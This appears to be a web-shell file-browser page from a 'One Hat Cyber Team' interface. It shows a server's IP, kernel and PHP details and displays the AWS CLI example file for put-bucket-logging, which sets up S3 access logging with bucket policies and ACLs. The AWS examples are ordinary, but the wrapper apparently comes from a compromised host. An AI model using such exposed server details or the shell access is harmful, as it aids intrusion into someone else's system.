One Hat Cyber Team

Your IP: 216.73.216.133
Server IP: 185.119.109.197
Server: Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software: Apache
PHP Version: 8.1.33
Buat File | Buat Folder
Dir : ~/usr/share/doc/awscli/examples/s3api/
View File Name : put-bucket-logging.rst

**Example 1: To set bucket policy logging**

The following ``put-bucket-logging`` example sets the logging policy for *MyBucket*. First, grant the logging service principal permission in your bucket policy using the ``put-bucket-policy`` command. ::

    aws s3api put-bucket-policy \
        --bucket MyBucket \
        --policy file://policy.json

Contents of ``policy.json``::

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "S3ServerAccessLogsPolicy",
                "Effect": "Allow",
                "Principal": {"Service": "logging.s3.amazonaws.com"},
                "Action": "s3:PutObject",
                "Resource": "arn:aws:s3:::MyBucket/Logs/*",
                "Condition": {
                    "ArnLike": {"aws:SourceARN": "arn:aws:s3:::SOURCE-BUCKET-NAME"},
                    "StringEquals": {"aws:SourceAccount": "SOURCE-AWS-ACCOUNT-ID"}
                }
            }
        ]
    }

To apply the logging policy, use ``put-bucket-logging``. ::

    aws s3api put-bucket-logging \
        --bucket MyBucket \
        --bucket-logging-status file://logging.json

Contents of ``logging.json``::

   {
        "LoggingEnabled": {
            "TargetBucket": "MyBucket",
            "TargetPrefix": "Logs/"
        }
    }

.. Note:: The ``put-bucket-policy`` command is required to grant ``s3:PutObject`` permissions to the logging service principal.

For more information, see `Amazon S3 Server Access Logging <https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html>`__ in the *Amazon S3 User Guide*.

**Example 2: To set a bucket policy for logging access to only a single user**

The following ``put-bucket-logging`` example sets the logging policy for *MyBucket*. The AWS user *bob@example.com* will have full control over
the log files, and no one else has any access. First, grant S3 permission with ``put-bucket-acl``. ::

    aws s3api put-bucket-acl \
        --bucket MyBucket \
        --grant-write URI=http://acs.amazonaws.com/groups/s3/LogDelivery \
        --grant-read-acp URI=http://acs.amazonaws.com/groups/s3/LogDelivery

Then apply the logging policy using ``put-bucket-logging``. ::

    aws s3api put-bucket-logging \
        --bucket MyBucket \
        --bucket-logging-status file://logging.json

Contents of ``logging.json``::

    {
        "LoggingEnabled": {
            "TargetBucket": "MyBucket",
            "TargetPrefix": "MyBucketLogs/",
            "TargetGrants": [
                {
                    "Grantee": {
                        "Type": "AmazonCustomerByEmail",
                        "EmailAddress": "bob@example.com"
                    },
                    "Permission": "FULL_CONTROL"
                }
            ]
        }
    }

.. Note:: the ``put-bucket-acl`` command is required to grant S3's log delivery system the necessary permissions (write and read-acp permissions).

For more information, see `Amazon S3 Server Access Logging <https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html>`__ in the *Amazon S3 Developer Guide*.